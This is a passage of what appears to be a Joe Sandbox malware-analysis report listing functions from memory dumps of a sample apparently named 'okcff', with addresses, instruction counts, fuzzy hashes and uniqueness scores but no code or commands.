                                                            • Opcode ID: 2756d55730fad576ae236ac576677ce0663c20422cb00a258198e3c3c6321f49
                                                            • Instruction ID: de7c27e030aebf65928bb710503e167477b4dba7e6cbdf9bbdad9231e3c5ea2c
                                                            • Opcode Fuzzy Hash: 2756d55730fad576ae236ac576677ce0663c20422cb00a258198e3c3c6321f49
                                                            • Instruction Fuzzy Hash: 57B1A030E89218FFCB1CAB64E0542BDBAA3AFC4340F925439D527AB384DB315D49CB52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0211AE20, Relevance: .3, Instructions: 295COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e053af12940b45db6eb9e47c30262d92b89c89b73af9a1eafa1ec0d552355192
                                                            • Instruction ID: d97623241b7f1fa1203d88f759742fd5053d7142afbccb66e1db295aeb533cc4
                                                            • Opcode Fuzzy Hash: e053af12940b45db6eb9e47c30262d92b89c89b73af9a1eafa1ec0d552355192
                                                            • Instruction Fuzzy Hash: D8A1D530B49216DFC7285F34941413DBAE3BF89718726853EC6668B350EF318D46CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02183388, Relevance: .3, Instructions: 276COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: be7d264e279e3f183fb18f9dff4c301238b3ba2573ef96880e9b809ce990a5ba
                                                            • Instruction ID: c1c2a488154f540795e11c5ae3a20425b724750db89622f185ec6678a6e0575b
                                                            • Opcode Fuzzy Hash: be7d264e279e3f183fb18f9dff4c301238b3ba2573ef96880e9b809ce990a5ba
                                                            • Instruction Fuzzy Hash: 17A19F31B452049FCB05DF69D494AAEBBF2EF89614F2884A6E821DB391CB35DD42CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021804B8, Relevance: .3, Instructions: 272COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5de50e0f697da05efc97836c0def1bd82530a27b584fbfead80de3c06b7339e4
                                                            • Instruction ID: 421b32edd8b34a2bd50124debbe1f012f467b66bb55847ad633b03ac83d78841
                                                            • Opcode Fuzzy Hash: 5de50e0f697da05efc97836c0def1bd82530a27b584fbfead80de3c06b7339e4
                                                            • Instruction Fuzzy Hash: CDA1F334794518CFC708EF39C8D8A2977EAAF8D64431640A9E556CB372DB61EC45CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02114620, Relevance: .3, Instructions: 255COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d0c00f7daf6410bdc8d8b64b22adcf1b95bc733ebe1650818226903900cb8b3c
                                                            • Instruction ID: c35d62f7d148cdb351047107e368aad3d872826f48ad55c3e2f9c71c772b87c5
                                                            • Opcode Fuzzy Hash: d0c00f7daf6410bdc8d8b64b22adcf1b95bc733ebe1650818226903900cb8b3c
                                                            • Instruction Fuzzy Hash: 52A1AA74A08258CFC718EFA8C4545ADBBF2FF89718B12847DD122AB355DB35984ACB81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0211CD97, Relevance: .3, Instructions: 252COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77c4e8a20cf43a03c81da1a764a1743010dbbd3e1bb0c8b6d8efe6caeb366f56
                                                            • Instruction ID: a628a150ad750d76df66e14a96a5276e3b66c15e0ba77dcc8d9167158dd9e51a
                                                            • Opcode Fuzzy Hash: 77c4e8a20cf43a03c81da1a764a1743010dbbd3e1bb0c8b6d8efe6caeb366f56
                                                            • Instruction Fuzzy Hash: 3FA16F30985249CFCF19CF60D844AAEBBB2BF45304F16857BE012AB651D731E982CBD2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021617B9, Relevance: .2, Instructions: 238COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621229391.0000000002160000.00000040.00000010.sdmp, Offset: 02160000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2160000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a3005521be1ce37fa2811d6dede3362abd0cbfdadc365b83c41726805ae3d960
                                                            • Instruction ID: dfbc34d306837b1d0d77895d6743439bca665e09ca726d566bd128b9c17a9f1c
                                                            • Opcode Fuzzy Hash: a3005521be1ce37fa2811d6dede3362abd0cbfdadc365b83c41726805ae3d960
                                                            • Instruction Fuzzy Hash: 6181AC31E04284DFCB24CFA8C5855ADB7B6FF85310B25856AD859AB311CB32EC91CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0218C5F0, Relevance: .2, Instructions: 236COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 014d0044b56f5a8b4c09dc7ae4209cf66e0368ff89b67739903d923e16273f62
                                                            • Instruction ID: 3857b25c89d9260d295deaa81c94e6de046e61dc0a3023eb2bfdeef05a7c207d
                                                            • Opcode Fuzzy Hash: 014d0044b56f5a8b4c09dc7ae4209cf66e0368ff89b67739903d923e16273f62
                                                            • Instruction Fuzzy Hash: 7BA1DE34A50118DFCB08EFA4D994AADB7B2FF89304F158169E905AB365DB30ED46CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021123E8, Relevance: .2, Instructions: 228COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 31e9ad9ce157d93d639b4757fc02fe0656a67a67c4c74a7064f20502c836c091
                                                            • Instruction ID: b5b8bb2caace2179fbb77efbb19dbefad7d61469ba341078a5e0efd9120cf95c
                                                            • Opcode Fuzzy Hash: 31e9ad9ce157d93d639b4757fc02fe0656a67a67c4c74a7064f20502c836c091
                                                            • Instruction Fuzzy Hash: B0711231B082649FCB45DF68C4A0AAFB7A2EF89314F15843AED15DB345CB30DD528B92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0542E3F0, Relevance: .2, Instructions: 227COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2cb529afede9fd1ab3eae7c758cd4e04d8b40e000d96ee69062273e161139fde
                                                            • Instruction ID: 9c0a63d482f37f2945167c78ff89ad483e03f85b981185e37ed7eb3b8c509d27
                                                            • Opcode Fuzzy Hash: 2cb529afede9fd1ab3eae7c758cd4e04d8b40e000d96ee69062273e161139fde
                                                            • Instruction Fuzzy Hash: 96713531B146308FCB24DBA5D854AFFB7BBBF85210F8045AFE1169B791DB30A9168781
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02160468, Relevance: .2, Instructions: 218COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621229391.0000000002160000.00000040.00000010.sdmp, Offset: 02160000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2160000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d1f41e44dac698fc53b5dada2894563d5f8964903b8e6a9d23c218114a767067
                                                            • Instruction ID: d0d84d13b3482e3c0d3222198423b5b7c4dd02da6057d21c10ca79d02384c634
                                                            • Opcode Fuzzy Hash: d1f41e44dac698fc53b5dada2894563d5f8964903b8e6a9d23c218114a767067
                                                            • Instruction Fuzzy Hash: 4461AC31FC8221AB8B391A69552833F65D7BBCCA54B664429DA17DB340DF31CC62C7E2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02111680, Relevance: .2, Instructions: 190COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4127a13c7584a23aad4340326edcb4859135d5a9a9d551be4fb73f000befb710
                                                            • Instruction ID: b7ae31048284a51fc0bd8386648e09291ef659e02eb29e1e8392d0c0abcb21cf
                                                            • Opcode Fuzzy Hash: 4127a13c7584a23aad4340326edcb4859135d5a9a9d551be4fb73f000befb710
                                                            • Instruction Fuzzy Hash: 8671A035A44209EFCB15CF68C480AADF7F2BF89314F1585A6D51AAB361D731EC45CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02186248, Relevance: .2, Instructions: 188COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 33a50a37c563d9cb11be40fe2cbf4ae6c19fba9e6be8fbc5305d8a7fb9be292e
                                                            • Instruction ID: a052ec51b910d850da4a606d262267292c3403078c90cb2a637326d3af50c783
                                                            • Opcode Fuzzy Hash: 33a50a37c563d9cb11be40fe2cbf4ae6c19fba9e6be8fbc5305d8a7fb9be292e
                                                            • Instruction Fuzzy Hash: 0051BB30B482408FCB19AF74C49456E77B6AF8A304B1548ACDA16DB3A5CF36EC46CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02119D20, Relevance: .2, Instructions: 178COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c7f65803e641f701701c65b73368f3ccd37d410401cc42d0fd5685b54ef4a9ab
                                                            • Instruction ID: ac1187fa181f39773296ad19c8a61a4b30e5b80dac7077e6bdcddb67a0f287ac
                                                            • Opcode Fuzzy Hash: c7f65803e641f701701c65b73368f3ccd37d410401cc42d0fd5685b54ef4a9ab
                                                            • Instruction Fuzzy Hash: 34513B3174D6948FCB1A9B78C82057EBBB2AF83214B1A44BED466DF341DB31AD05C792
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0218EC88, Relevance: .2, Instructions: 165COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 04a6093935d7e703016ca1e641346f7db46b1c983a2ca687dcc0f469379d25da
                                                            • Instruction ID: f2702ed7c42f4cb1643f130c844c12efc7d0cb41a107910fdfd378cc8e393994
                                                            • Opcode Fuzzy Hash: 04a6093935d7e703016ca1e641346f7db46b1c983a2ca687dcc0f469379d25da
                                                            • Instruction Fuzzy Hash: 9B51D3307482544FCB09EF358894A7E3BE7AFCA214B158469F506CB3A5EF35DC468B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0542DDB8, Relevance: .2, Instructions: 161COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2f24588013d964ed4aaa6126db8b29d204956ffce6006add54390b6904af76d8
                                                            • Instruction ID: 6b55cf425c9afac70d08fae8c37750f7acc24a07cb1aeaceee0fa3f945535a64
                                                            • Opcode Fuzzy Hash: 2f24588013d964ed4aaa6126db8b29d204956ffce6006add54390b6904af76d8
                                                            • Instruction Fuzzy Hash: 3851E331A0C975CFC705DB24C8948FEBBB2AF8521078681ABE11B8B666C731AC07C791
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02181E90, Relevance: .2, Instructions: 154COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3b5e7b612cfb77bb13e96c70522f5a2457f9e3fd9711e4dde05abe953ce82054
                                                            • Instruction ID: 23129861f4afcbb705dd35d2e26e184093c8501608026056fc42056ba6ca9c68
                                                            • Opcode Fuzzy Hash: 3b5e7b612cfb77bb13e96c70522f5a2457f9e3fd9711e4dde05abe953ce82054
                                                            • Instruction Fuzzy Hash: BF517E76600100AFCB459FA8D945D6A7BB7FF8D31471A80A4E2099F372CB32DC62DB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02180007, Relevance: .2, Instructions: 153COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c7e8caaaebc8bd78239227eed0a3383c0d3400e8c718a196844e069b2ea2d92c
                                                            • Instruction ID: 362c26a3f7d78be325e4f0842a77612f8cf777484ed00c63db812cecd2f81786
                                                            • Opcode Fuzzy Hash: c7e8caaaebc8bd78239227eed0a3383c0d3400e8c718a196844e069b2ea2d92c
                                                            • Instruction Fuzzy Hash: 4951C330A49248DFDB15EF64C8D0ABEBBB2EF49350F1540AAE452DB2A2D7309D49CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02183020, Relevance: .2, Instructions: 153COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9bc522f98920c873f5208ca8e1f1b1640a86ea2f9412bc88465f2e2d7d66fbc1
                                                            • Instruction ID: 4bd3b338f6470e9c42e402f9460ba86059fc285071dd3626740c31c7e9d477e9
                                                            • Opcode Fuzzy Hash: 9bc522f98920c873f5208ca8e1f1b1640a86ea2f9412bc88465f2e2d7d66fbc1
                                                            • Instruction Fuzzy Hash: EE51E231A046168FCB10DF68C4909AAFBB1FF86B24B1986A9D524AB341D730FD52CBD1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02118378, Relevance: .1, Instructions: 147COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f18f3abfbc0a4a8edb5131cfac1b712f702f8ad38a4025e8ff1d9b0b1b28b8a1
                                                            • Instruction ID: bf0c17539f029a0961a55560108aafbaed8c2a0e5dcd2ad06357703ab7ec3ea6
                                                            • Opcode Fuzzy Hash: f18f3abfbc0a4a8edb5131cfac1b712f702f8ad38a4025e8ff1d9b0b1b28b8a1
                                                            • Instruction Fuzzy Hash: 2051B670A84205CFEB19CF54C481ABEB7B1EF89314B17C57AD5129BA61DB31DC02CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0218C1C8, Relevance: .1, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4cad0693cac6416f7721c55345824d475770f0fb2e73ec106d5532fc5f407e0e
                                                            • Instruction ID: 7251154fa1a44d7720bc0186e863e28982e29ba9f19b57064d264d9f9c3f08bd
                                                            • Opcode Fuzzy Hash: 4cad0693cac6416f7721c55345824d475770f0fb2e73ec106d5532fc5f407e0e
                                                            • Instruction Fuzzy Hash: D6517534B505099FCB04EF64E498AAEBBB6FFC9711F00851AE502973A4DF309946CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021122B8, Relevance: .1, Instructions: 145COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 53596d51b8b60f0513473c42aa2c8b4b5d1300ee672f0d5e2bc7525aa7999ed6
                                                            • Instruction ID: 9dc0672d6437c2ce610f51d6d360f44d965ddf47f7e302e188324baf1aadb513
                                                            • Opcode Fuzzy Hash: 53596d51b8b60f0513473c42aa2c8b4b5d1300ee672f0d5e2bc7525aa7999ed6
                                                            • Instruction Fuzzy Hash: D651D530B192559FCB05DF68C890DAEBBF1EF9A31071580AAE959EB352D730ED01CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021156F8, Relevance: .1, Instructions: 139COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4cc87f0ea15cbacf8ceaacda6accc39d78604af59068cbb68840cf62a9cfa277
                                                            • Instruction ID: e0d2eda5e8382925ac3f671b5535f14deaf190131a123f141dd5294217b60b83
                                                            • Opcode Fuzzy Hash: 4cc87f0ea15cbacf8ceaacda6accc39d78604af59068cbb68840cf62a9cfa277
                                                            • Instruction Fuzzy Hash: 5D412532209695EFC712CF28D850D99FFB2FF8232478A81A7D555CB262C331E859CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02183AC0, Relevance: .1, Instructions: 126COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f326d3cb7bbc536012132f9cddcb033693fa9473865602ad1701076fa0b36a2c
                                                            • Instruction ID: 2b1aa07ea96df3f63c4c37e653bf7b881064708eb5b2d2481781849171fa33ba
                                                            • Opcode Fuzzy Hash: f326d3cb7bbc536012132f9cddcb033693fa9473865602ad1701076fa0b36a2c
                                                            • Instruction Fuzzy Hash: 6F418130B412099FDB24EF64D494B6EB7F2AB89B04F1884A9D525AB250DB31DD42CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02161C03, Relevance: .1, Instructions: 123COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621229391.0000000002160000.00000040.00000010.sdmp, Offset: 02160000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2160000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e295fba3dfb36114dd5c82ae083baa7fdd4861c7d60fca4a4fc0f4f1251dcc6d
                                                            • Instruction ID: b00f05c00e2e9ff71e2f588f8b4ffebe580fcaa8a1f7958a0d1d268994d9bc61
                                                            • Opcode Fuzzy Hash: e295fba3dfb36114dd5c82ae083baa7fdd4861c7d60fca4a4fc0f4f1251dcc6d
                                                            • Instruction Fuzzy Hash: C231C331A05284DFC714CF68C1599FDBBF2AF4A200F16C0A9D859AB761CB31EC45CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02111D18, Relevance: .1, Instructions: 117COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 398396a9e48927b5c6cfb2a79adc070c38297252eeddea2bf4dd9b1b10988667
                                                            • Instruction ID: 21f9c8f06789b51cce6b8094dd304580320bb91d0ba6e3839e2a17144181f3c4
                                                            • Opcode Fuzzy Hash: 398396a9e48927b5c6cfb2a79adc070c38297252eeddea2bf4dd9b1b10988667
                                                            • Instruction Fuzzy Hash: 72318B3130C6902FC706AB38946446EBBA69F93A1474A44BEE619DF342CF35DD058792
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0542D54F, Relevance: .1, Instructions: 112COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a48b5109d584de41098d4c4079ae84709dfeb9bb7743583a0f882a038f1c61cb
                                                            • Instruction ID: a6782c5b5c1e5c4d9db6e0ae15f51f70cd5e0cb449df583a089de8e531874618
                                                            • Opcode Fuzzy Hash: a48b5109d584de41098d4c4079ae84709dfeb9bb7743583a0f882a038f1c61cb
                                                            • Instruction Fuzzy Hash: A031E030A08754CFCB15DF34D8A48AE7FB2AF86614B05486BE502CB262CB719D46CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0542C8E8, Relevance: .1, Instructions: 107COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 995b6838d3e69e59f2dc1551b8317a8cb122ddc6338a2b97705f95bdf4a9a13e
                                                            • Instruction ID: b6aceb65f0776832b288316f5e0b9f6670f3d2e3899c1f38d0394d7c22810c62
                                                            • Opcode Fuzzy Hash: 995b6838d3e69e59f2dc1551b8317a8cb122ddc6338a2b97705f95bdf4a9a13e
                                                            • Instruction Fuzzy Hash: 0331E63160D7B0AFC321EB2494905BE7BA3AF96210785856BD4478B746CB369D0BC7D2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02183C70, Relevance: .1, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d00de7d04439d17e58be37cab37a42c0a7b2e1f0dee9b68d2e61244a4dad3aff
                                                            • Instruction ID: 72006f829190fe29d3afd6aae4bd830d26019643ee359868fa26c4207d39e9aa
                                                            • Opcode Fuzzy Hash: d00de7d04439d17e58be37cab37a42c0a7b2e1f0dee9b68d2e61244a4dad3aff
                                                            • Instruction Fuzzy Hash: 6941EF31A006158FCB14EF69D8847BEBBB2FF84B04F0485A6E921E7250EB35D945CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02182145, Relevance: .1, Instructions: 104COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 73d12ffca8e668ad86e1b0cf75b244589033fd5960796592298e14b22dc4d59a
                                                            • Instruction ID: 67c096446080f10e06ed8a9d5fc120ae1a7d35bf65567071e629b4676f61187c
                                                            • Opcode Fuzzy Hash: 73d12ffca8e668ad86e1b0cf75b244589033fd5960796592298e14b22dc4d59a
                                                            • Instruction Fuzzy Hash: 0B01D431A4C2D10FD316976858A4BABBFB1EF8A210F1945AAD9859B252C772AC42CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02184B89, Relevance: .1, Instructions: 100COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 56defbde7cc3e86659add7d694f3195fd44810d6d1cf0e83588d6794d2ca287d
                                                            • Instruction ID: a12cd9b1abff679ddfffed8a55933801dbde70eea7a45d25d5cbaf52663b5356
                                                            • Opcode Fuzzy Hash: 56defbde7cc3e86659add7d694f3195fd44810d6d1cf0e83588d6794d2ca287d
                                                            • Instruction Fuzzy Hash: 14411A34A412288FEB65DF64C891FA9B7B5EF48720F1041D5E909AB391DB31DD81CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0211D3B0, Relevance: .1, Instructions: 100COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b6d671c8a084f696d5fce0a0759808a96f1eee5dbd35aeac8f16b3d3a75fecce
